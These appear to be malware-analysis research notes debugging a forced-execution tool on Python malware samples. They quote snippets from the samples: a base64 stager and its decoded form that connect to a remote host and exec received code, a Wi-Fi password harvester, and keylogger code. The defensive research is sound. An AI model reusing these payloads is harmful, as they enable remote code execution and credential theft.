--- tags: forced-execution --- # Categorised MWEs [25 June]: ## 1. Uncovered Code in `for` iteration * The return value of function `get_wlans()` is an empty array because the VM does not have WLAN devices. So the code `f.write()` in the `for` iterator is not executed. * Now the tool will assign a fake object if the program tries to iterate a 0-length object to cover the code inside iterator. ```python= def wifipass(): def get_wlans(): data = os.popen("netsh wlan show profiles").read() wifi = re.compile("All User Profile\s*:.(.*)") return wifi.findall(data) f = open("wifi.txt","w") for wlan in get_wlans(): f.write("-----------\n"+" SSID : "+wlan + "\n Password : " + get_pass(wlan)) ``` <div style="text-align:center; font-style: italic;">MWE for `a79190a4d88a7e7f759944a97e116046c13f1df7`</div> # Categorised MWEs [4 June]: ## 1. Lack of forced-execution for defined classes in main file ### 1.1 Class passed to imported object's method Not force executing an imported method leads to lack of forced-execution of all class instances and it's corresponding methods passed to it. ```python= from http.server import HTTPServer, BaseHTTPRequestHandler class myRequestHandler(BaseHTTPRequestHandler): try: def do_GET(self): self.printCustomHTTPResponse(200) print("GET") def printCustomHTTPResponse(self, respcode): self.send_response(respcode) except Exception: pass httpd = HTTPServer(('', 80), myRequestHandler) httpd.handle_request() ``` <div style="text-align:center; font-style: italic;">MWE for `0191bd8ed1d24f2e7d328a9f82f96bcdc32e7fb6`</div> ### 1.2 Class object passed to unavailable imported function is not forced-executed When an object created from a class in main-file is passed to a function that is imported but is not available, it will not be forced-executed. Meanwhile naively forced-executing all methods may not result in appropriate execution since an order of execution maybe necessary. ```python= from tcpexploit import * # standard_callback_commandline will come from here from httpclientside import httpclientside class theexploit(httpclientside): def __init__(self): print("init") def is_vulnerable(self, info_dict): print("init") def makePDF(self): print("init") def makesploit(self, clientheader, clientbody): print("init") def run(self): print("init") app = theexploit() # make object ret = standard_callback_commandline(app) # invalid function, will be created forcefully if ret not in (0, 1, None): ret.interact() ``` <div style="text-align:center; font-style: italic;">MWE for `130baecc8d15d60289b52c0add879389e6f47ea1`</div> ## 2. Infinitely running loops Loops run infinetly and so the program doesn't stop executing. > Need for forcefully limiting the execution to N loop iterations ```python= while 1: x = input('> ') if x == '1': print('TEST 1') print("OUT OF LOOP") ``` <div style="text-align:center; font-style: italic;">MWE for `80ca4f86cd57a918c8fd0cf2bba4c5766f68b600`</div> ## 3. Lack of fine-grained information for some imported objects and methods Some methods executed will be logged/printed with pointer address rather than the name of the method itself. ``` python import ctypes print(ctypes.windll.kernel32.CreatThread) ``` <div style="text-align:center; font-style: italic;">MWE for `0f4ea2bdcf27cb31b36816f739631f737a6a143d`</div> The above method would be logged as follows: `_FuncPtr object at 0x000001DD2982EC78` ## 4. Use of code in exception block The code for **Necro** taken from [here](https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/) shows that code is being executed in except block and so the need for executing *both* try and exception block. ![](https://i.imgur.com/SAdzdkn.png) [source](https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/) # MWEs by Ali [4 June] Author: Ali This document outlines different cases the tool currently fails. ## Case 1 `0f4ea2bdcf27cb31b36816f739631f737a6a143d`: The following `windll` object is logged as a pointer. More specifically: `<ctypes.LibraryLoader object at 0x000001E210B44648>` ``` python import ctypes print(ctypes.windll) ``` <div style="text-align:center; font-style: italic;">MWE for `0f4ea2bdcf27cb31b36816f739631f737a6a143d`</div> In doing so, the logs and output miss this information as to what object is being called. Likewise, all methods suffer from the same issue. ``` python import ctypes print(ctypes.windll.kernel32.CreatThread) ``` <div style="text-align:center; font-style: italic;">MWE for `0f4ea2bdcf27cb31b36816f739631f737a6a143d`</div> The above method would be logged as follows: `_FuncPtr object at 0x000001DD2982EC78` [Reference link.](https://docs.python.org/3/library/ctypes.html#accessing-functions-from-loaded-dlls) Interesting bits from [Reference](https://docs.python.org/3/library/ctypes.html#accessing-functions-from-loaded-dlls): >![](https://i.imgur.com/WZJw3Ek.png) ## Case 2 `0191bd8ed1d24f2e7d328a9f82f96bcdc32e7fb6` Request handlers need to be run. Currently, the forced execution will not run all request handlers as shown below. ```python= from http.server import HTTPServer from http.server import BaseHTTPRequestHandler class myRequestHandler(BaseHTTPRequestHandler): try: def do_GET(self): self.printCustomHTTPResponse(200) print("GET") def printCustomHTTPResponse(self, respcode): self.send_response(respcode) self.send_header('Content-type', 'text/html') self.send_header('Server', 'myRequestHandler') self.end_headers() except Exception: pass httpd = HTTPServer(('', 80), myRequestHandler) try: httpd.handle_request() httpd.serve_forever() except KeyboardInterrupt: print('\n\n Exiting exploit...\n\n') ``` <div style="text-align:center; font-style: italic;">MWE for `0191bd8ed1d24f2e7d328a9f82f96bcdc32e7fb6`</div> In order to run these, following two properties must be added: 1. Expand forced-execution depth to allow forced execution in `httpd` methods that are invoked and recursively inside them. 2. All object creation and their corresponding constructors must be forced-executed. (Already catered within the main file) ## Case 3 `09a7a1f35859e73245311b1e0416c27ee5a750ec` Failed decoding causes Fake object that results in failed payload for `exec` function. ```python= exec( __import__('base64') # Causes error leading to Fake-object .b64decode( __import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMTAuMTInLDQ0MykpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')[0] ) ) # Fix is import importlib => then use as this => importlib.__import__('base64') ``` ## Case 4 `130baecc8d15d60289b52c0add879389e6f47ea1` In the below case, the forced function `standard_callback_commandline` will not do anything. In this manner our tool cannot expose the methods of the object `theexploit`. ```python= from tcpexploit import * # standard_callback_commandline will come from here from httpclientside import httpclientside class theexploit(httpclientside): def __init__(self): print("init") def is_vulnerable(self, info_dict): print("init") def makePDF(self): print("init") def makesploit(self, clientheader, clientbody): print("init") def run(self): print("init") app = theexploit() # make object ret = standard_callback_commandline(app) # invalid function, will be created forcefully if ret not in (0, 1, None): ret.interact() ``` <div style="text-align:center; font-style: italic;">MWE for `130baecc8d15d60289b52c0add879389e6f47ea1`</div> # MWEs by Mohd Hasan [4 June] Author: Mohd Hasan ## Case 1 `80ca4f86cd57a918c8fd0cf2bba4c5766f68b600`: * Forced execution runs infinitely on while loops written in the manner below. * The `1` below can also be replaced by `True` with similar behavior. For this MWE, I use `1` to replicate the syntax of this HASH. * The only way to exit this loop is to hold Ctrl+C. * Note that in this case, the print statement `OUT OF LOOP` is never reached by the tool. ```python= while 1: x = input('> ') if x == '1': print('TEST 1') print("OUT OF LOOP") ``` <div style="text-align:center; font-style: italic;">MWE for `80ca4f86cd57a918c8fd0cf2bba4c5766f68b600`</div> --- # Categorised MWEs [29 May] ## 1. External modules not catered by tool ### 1.1: File does not exist for imported module's API For modules that are imported, if their API accesses a file that does not exist, the tool does not create a temporary file and so the tool fails. Example: ```python= import logging hdlr = logging.FileHandler('/tmp/starter.log') # throws error as file does not exist ``` <div style="text-align:center; font-style: italic;">MWE for `3c9d127000153c3edd36a71956ad1f6280efad9c`</div> ## 2. Python migration from 2 to 3 issues: ### 2.1: Unsupported functions/module not catered by `futurize`: 1. `reload` function: ```python= import sys reload(sys) # error 1 ``` <div style="text-align:center; font-style: italic;">MWE for `20c164f492be9e41b1b5a62efb7777873d0a6372`</div> 2. `pycrpto.AES.new()` function (`c48899a78536168aeae311d31b5439d98bcf7c21`) 3. `times` module (`d2413d2d0f8a9a1e250d3a1b17df07da12df42c0`) 4. `from types import NoneType, UnicodeType, StringType` (`0119c033664605b6ba9bcca362e21eebe6a37f07`) 5. `sys.setdefaultencoding('cp1251')` function (`0045442f29ded66089a6f1a4511d13b62b0d1676`) - [ref](https://stackoverflow.com/a/3828742) ## 3. Import issues: | Module | Description | Error Type | | -------- | -------- | -------- | | `from httplib2 import Http` | Available on pip and was installed during tests | Segmentation Fault | | `import lazagne` | not available on pip | Module not found| | `import dpapilib` | not available on pip | Module not found| | `import StarterNetUtils`| not available on pip | Module not found| | `import fake_useragent` | available on pip - *should install and retest* |Module not found| | `import winstr`| not available on pip | Module not found| | `import times`| available on pip - *should install and retest* | Module not found| | `import modules`| not available on pip | Module not found| | `import Exploits`| not available on pip but found [here](https://code-gitlab.linusl.de/StackNeverFlow/NekoBotV1/-/blob/master/Tools/NekoBot/Exploits/Com_bt_portfolio.py) | Module not found| | `import settings`| not available on pip | Module not found| | `import Mode`| not available on pip. The one uses is a custom module. [ref](https://github.com/GhostPack/KeeThief) | Module not found| ## 4. Encoding and parsing issues: The following issues are related to encoding issues by our tool. ### 4.1: Strings `decoded` by different codec than expected: These are examples where the code expects the target machine to have a certain encoding (where it actually does not) and attempts to decode it. Example: Does not log due to decoding issue since it expects the string to be encoded by 'cp1251' where it actually is not. Default encoding is `utf-8` in python 3. > 'cp1251' is for Bulgarian, Byelorussian, Macedonian, Russian, Serbian languages. ```python= path = os.path.expanduser('~').decode('cp1251') print(path) ``` <div style="text-align:center; font-style: italic;">MWE for `08432c47381dddf71d0b32fcbb9eef4c32b421f0`</div> Removing the `.decode('cp1251')` fixes the error ### 4.2: Strings encoded by different codec than the supported These are examples where the interpreter expects the target strings in code to have a certain encoding (where it actually does not) and attempts to read it. Example: Inerpreter fails to decode the string and so throws and decoding issue. > To Check: Does the original **pyc** file have the same issue or not ```python= logo = '\n\t\n\t █████╗ ██████╗ ██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗ \n\t ██╔══██╗██╔══██╗██╔══██╗ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗\n\t ███████║██║ ██║██████╔╝█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝\n\t ██╔══██║██║ ██║██╔══██╗╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗\n\t ██║ ██║██████╔╝██████╔╝ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║\n\t ╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝\n\t * Find and Exploit android devices Created by LimerBoy\n\t\n\t\n\t\n\t' print(logo) ``` <div style="text-align:center; font-style: italic;">MWE for `1fbadae53b00ac6ba89338577102a667fda3dcf5`</div> ### 4.3: Payload fails to run correctly through ` `: Ends up throwing error through `exec` while the original code works fine. Example (`6af52de0b2a55e9494ae42ae41944e4016d35fcf`): ``` # from builtins import bytes # import base64, sys # exec(base64.b64decode({2: str, 3: lambda b: bytes(b, 'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjAuMS4xMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='))) ``` Above code throws the following error: ``` AttributeError: 'list' object has no attribute 'find_module' ``` Meanwhile the following decoded code works fine: ```python= import socket,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('10.0.1.11',4444)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)<l: d+=s.recv(l-len(d)) exec(d,{'s':s}) ``` > **To do:** Inspect what may be the case here. ### 5. Failed decompilation Failed decompilation creating broken code (only 2 cases observed so far). > **TO DO:** An original pyc was for python 3.7. Test python bytecode out to see if any issues exist. ### 6. Function invoked before function definition This is undoubtedly dumb programming. > **To do:** However, need to further inspect if the original bytecode works or not. Perhaps the program flow is different in the bytecode that is not being reflected in the decompiled code. ```python= Init() # calls function that is defined later def Init(): print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for `3cdf7b6dc6500b44bce5af1ab6bcb59f56cd15af`</div> ## X. Other bugs: These are other bugs that need to be inspected further. ### X-A. Using `Listner` constructor in `from pynput.keyboard import *` causes segmentation fault. Segmentation fault suggests in-tool issue (and so no trace available). Need to fix. ---- Original MWEs are shown from here on. ---- # MWEs by Ali [29 May] Author: Ali This document outlines different cases the tool currently fails. ## Case 1: `01305067332ad25cf70aad90e0e7497e83a51dc7` > [name=yk] Is this just because it is missing the library? seems to be a simple engineering effort is needed to fix. Not that interesting if that's the case. Does not log since the following causes segmentation fault ``` python from httplib2 import Http # error causing line print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for `01305067332ad25cf70aad90e0e7497e83a51dc7`</div> ## Case 2: `08432c47381dddf71d0b32fcbb9eef4c32b421f0` > [name=yk] **little more interesting**. What is special about the decode? > If decode is problematic, is `os.path.expanduser()` needed? why not just a string and then .decode? Does not log due to decoding issue. ```python= path = os.path.expanduser('~').decode('cp1251') print(path) ``` <div style="text-align:center; font-style: italic;">MWE for `08432c47381dddf71d0b32fcbb9eef4c32b421f0`</div> Removing the `.decode('cp1251')` fixes the error ## Case 3: `0cc77a4ad4015972b6c0cf0872070255e2a99881` > [name=yk] Which part is causing error in the constructor? Need to narrow down to a faulty line. > This seems to be a bug can be fixed with an engineering effort (= not that interesting) => however, don't know until I see the faulty line. update this. Adding listners causes segmentation fault. The error is caused with `Listener` constructor ```python= from builtins import str import pynputs from pynput.keyboard import * def on_press(key): pass def on_release(key): if key == Key.esc: return False # Following causes segmentation fault with Listener(on_press=on_press, on_release=on_release) as (listener): listener.join() ``` <div style="text-align:center; font-style: italic;">MWE for `0cc77a4ad4015972b6c0cf0872070255e2a99881`</div> ## Case 4: `1ab497b1cf619673b210bbca5d76b65585209b99` > [name=yk] isn't this the same as the first case? (missing a library). > if so, not that interesting, all of those should fixed with a simple engineering fix. Imports `lazagne` which does not exist ```python= import lazagne print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for `1ab497b1cf619673b210bbca5d76b65585209b99`</div> ## Case 5: `1fbadae53b00ac6ba89338577102a667fda3dcf5` > [name=yk] what do you mean by bad encoding? > I know some python tools have issues with handling UTF8 or unicode strings. For example, programs including some east asian characters (e.g., Korean, Chinese, Japanese) can crash debuggers when they load. > If this is such a case, we should just ignore. Not interesting and no fundamental challenge in this case. All you need to do is just configuring the tool and load or transform the samples to not have unicode strings. => these are not qualified for scientific findings. Uses a string with bad encoding. Does not let the tool to start executing. ```python= logo = '\n\t\n\t █████╗ ██████╗ ██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗ \n\t ██╔══██╗██╔══██╗██╔══██╗ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗\n\t ███████║██║ ██║██████╔╝█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝\n\t ██╔══██║██║ ██║██╔══██╗╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗\n\t ██║ ██║██████╔╝██████╔╝ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║\n\t ╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝\n\t * Find and Exploit android devices Created by LimerBoy\n\t\n\t\n\t\n\t' print(logo) ``` <div style="text-align:center; font-style: italic;">MWE for `1fbadae53b00ac6ba89338577102a667fda3dcf5`</div> ## Case 6: `20c164f492be9e41b1b5a62efb7777873d0a6372` > [name=yk] another unavailable package case? > group the same errors (especially those that are not interesting ones). 1. Imports `dpapilib` that throws an error. Cannot install from pip for now. Seems to be unsupported by python3. 2. Uses `reload` function that also is python 2 supported only Both of these issues are also in `08432c47381dddf71d0b32fcbb9eef4c32b421f0` file. ```python= import dpapilib # error 1 import sys reload(sys) # error 2 print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for `20c164f492be9e41b1b5a62efb7777873d0a6372`</div> ## Case 7:`3c9d127000153c3edd36a71956ad1f6280efad9c` > [name=yk] two cases: probably split it into 2 sub cases: 7.1 and 7.2. > for 7.1 (file not exist), I thought that it was already handled. please handle this. we just create a temp file and feed the file handle to the api. > for 7.2 (lib not exist), is it the same one as the case 1? make sure. 1. The `logging.FileHandler` opens the specified file and uses it as the stream for logging. In case of the below case, `'/tmp/starter.log'` does not exist and so throws an error. 2. Also the `StarterNetUtils` is imported and so this will throw the first error. ```python= import StarterNetUtils # throws an error import logging hdlr = logging.FileHandler('/tmp/starter.log') # throws error as file does not exist ``` <div style="text-align:center; font-style: italic;">MWE for `3c9d127000153c3edd36a71956ad1f6280efad9c`</div> ## Case 8: `3cdf7b6dc6500b44bce5af1ab6bcb59f56cd15af` > [name=yk] there are two case => split. > 8.1 (importing fake_useragent throwing an error): investigate more. is it because it doesn't exist? then it is not that interesting. if not, you need to see which line of the package having the problem. > 8.2 (init): I am not sure what's the exact problem here. If without line 1, will init(); cause the error? 1. the `fake_useragent` is imported and so this will throw the first error. 2. Calls `Init()` functions that is. This throws an error regardless of python version since it is an interpretted language. Also nothing is imported that may have this function (eg., `from x import *`). ```python= from fake_useragent import UserAgent # throws an error Init() # calls function that is defined later def Init(): print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for `3cdf7b6dc6500b44bce5af1ab6bcb59f56cd15af`</div> ## Case 9: `3e0b0460fe349343cae4aaacb0ad985b8c8c60fb` > [name=yk] this is not our focus. probably skip if the code is broken. but why broken? we need to briefly discuss. Failed decompilation creating broken code. > **TO DO:** The original pyc is for python 3.7. Test python bytecode out. # MWEs by Meng [29 May] Author: Meng ## Case 1 `d9af05a2c11e35b00823d04ecac85470f3f0429b` > [name=yk] does win32crypt exist? it is unclear whether this is the case of unavailable package. update the description. * Error is caused by unavailable package: `winstr` * But `winstr` is not really used in the source code. Removing the `winstr` fixes the error. ```python= from winstr import * ``` ## Case 2 `d94437d6aa2b74d56626e1cb31230949e21c4f48` > [name=yk] which previous? lost context. > I am not clear what this error means. re do. vague. * The error is caused by the invalid link. ```python= urllib.request.urlretrieve('http://lucifer.5gbfree.com/wall.jpg', '/home/wall.jpg') urllib.request.urlretrieve('http://lucifer.5gbfree.com/gif.gif', '/home/gif.gif') SPI_SETDESKWALLPAPER = 20 WALLPAPER_PATH = 'C:\\walpap.jpg' ``` ## Case 3 `d2413d2d0f8a9a1e250d3a1b17df07da12df42c0` > [name=yk] same case as the case 1 > by the way, please use different indexing. one can use #s 1~1000, the other can use 1000~2000 so that it wouldn't be confusing. * package import error * `times` and `modules` are not available ```python= import times from modules.system import regedit, killproc, delproc ``` ## Case 4 `c48899a78536168aeae311d31b5439d98bcf7c21` > [name=yk] context? example? new()? is this C++. can't parse this. * It uses old pycrpto.AES.new() which is not available for Python3 ```python= from Crypto.Cipher import AES as BTc_942 ``` # MWEs by Hasan [29 May] Author: Mohd Hasan ## Case 1: `00f30c367477d5a4b23ab3e681f20aa079499986` > [name=yk] good point that when the tool fails there's no error. > => need to discuss with Ali to find a way to turn on debugging option to analyze this further. > [name=Ali Ahad] This is an environment issue. Same issue with regular python. We can skip this. * Tool does not produce a log due to the import statement `from impacket import version`. * Note that all other imports from the module `impacket` do not cause any issues with log generation. * Note that running the tool on the MWE below does not generate any errors, nor indicate any failures to import. Despite this, no log file is generated. ``` python from impacket import version print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for 00f30c367477d5a4b23ab3e681f20aa079499986</div> ## Case 2: `0119c033664605b6ba9bcca362e21eebe6a37f07` > [name=yk] seems like a missing package case? then we need to integrate into a group. > @aliahad97, one action item is that the current tool does not provide details about the internal errors like the last executing code, faulty lines/modules. we need those to diagnose bugs quicker and easier. * Program attempts to import `NoneType`, `UnicodeType`, and `StringType` from the built-in python module `types`. * The type imports above do not exist in Python versions 3.x but they do exist in python versions 2.7.x. ```python from types import NoneType, UnicodeType, StringType print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for 0119c033664605b6ba9bcca362e21eebe6a37f07</div> ## Case 3: `0045442f29ded66089a6f1a4511d13b62b0d1676` > [name=yk] seems like a missing package case? then we need to integrate into a group. * Module `winstr` is not available. * `reload` and `sys.setdefaultencoding()` functions are not supported in Python 3.7. ```python from winstr import * # Error 1 reload(sys) # Error 2 sys.setdefaultencoding('cp1251') # Error 3 print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for 0045442f29ded66089a6f1a4511d13b62b0d1676</div> ## Case 4: `040098d9071514a094340ce891143e7472500d85` * Error importing`Exploits` module. * `Exploits` module cannot be installed via pip * Some research shows that this HASH is actually one of many python scripts which can be found in [this repository](https://code-gitlab.linusl.de/StackNeverFlow/NekoBotV1/-/blob/master/Tools/NekoBot/Exploits/Com_bt_portfolio.py). Looking through this repository, the module `Exploits` as well as the import `printModule` can be found. ```python from Exploits import printModule print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for 040098d9071514a094340ce891143e7472500d85</div> ## Case 5: `0b8a8a367d258ad06ffeacf3b0e91e5282260593` * Error importing `settings` module * `settings` module cannot be installed via pip ```python import settings print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for 0b8a8a367d258ad06ffeacf3b0e91e5282260593</div> ## Case 6: `21234194ff4b1ca80baf6e6b2219d27dcdb49573` * Error importing `Mode.config.powershell_exeute` module * Note that a `Mode` module can be installed via pip using the command `pip install Mode`, however this module does not have the `config` module within it. * Looking into this particular HASH leads to the [this repository](https://github.com/GhostPack/KeeThief) which also uses the embedded string:`Get-KeePassDatabaseKey` leading me to believe that the `Mode` module referenced in this HASH is a custom module. ```python import Mode.config print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for 21234194ff4b1ca80baf6e6b2219d27dcdb49573</div> ## Case 7: `67c2056d4a2d57482197237e40c064ed32776096` * Error importing `StarterNetUtils` and `StarterSettings` module(s) * Above modules cannot be installed via pip. Some googling shows that these modules are trojan .pyc files. ```python import StartNetUtils # Error 1 import StarterSettings # Error 2 print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for 67c2056d4a2d57482197237e40c064ed32776096</div> ## Case 8: `67e61ac7bd80f248b3bd636d7c842e2ca6a4d4a3` > [name=Ali Ahad] Bad programming. Should have used `getattr`. This will only be true when `sys` has attribute `frozen` and that is `true` which will be in the case of when the program is frozen. [ref](https://stackoverflow.com/questions/59238237/why-use-getattr-instead-of-hasattr-for-sys-frozen) > However, the other reason this may be used is because it is supposed to be used in an application. [Here](https://www.programcreek.com/python/example/7144/sys.frozen) are som examples. * No attribute error occurs because program attempts to call `frozen` attribute from `sys` module. * Similar error occurs when attempting to call the `_MessageBox` from `sys` module. ```python import sys if sys.frozen: print("hello") ``` <div style="text-align:center; font-style: italic;">MWE for 67e61ac7bd80f248b3bd636d7c842e2ca6a4d4a3</div> ## Case 9: `6af52de0b2a55e9494ae42ae41944e4016d35fcf` >[name=Ali Ahad] Must be a decoding issue. Running after decoding, it works fine. See code below for decoding. ```python= import socket,struct,time for x in range(10): try: s=socket.socket(2,socket.SOCK_STREAM) s.connect(('10.0.1.11',4444)) break except: time.sleep(5) l=struct.unpack('>I',s.recv(4))[0] d=s.recv(l) while len(d)<l: d+=s.recv(l-len(d)) exec(d,{'s':s}) ``` * This hash decodes and executes a very long string. Within this string, the program attempts to call the attribute `find_module` from a list. This leads to an error. * Note that the tool encounters this error even without the `exec` function as seen in the MWE below. ```python temp = [] temp.find_module ``` <div style="text-align:center; font-style: italic;">MWE for 6af52de0b2a55e9494ae42ae41944e4016d35fcf</div>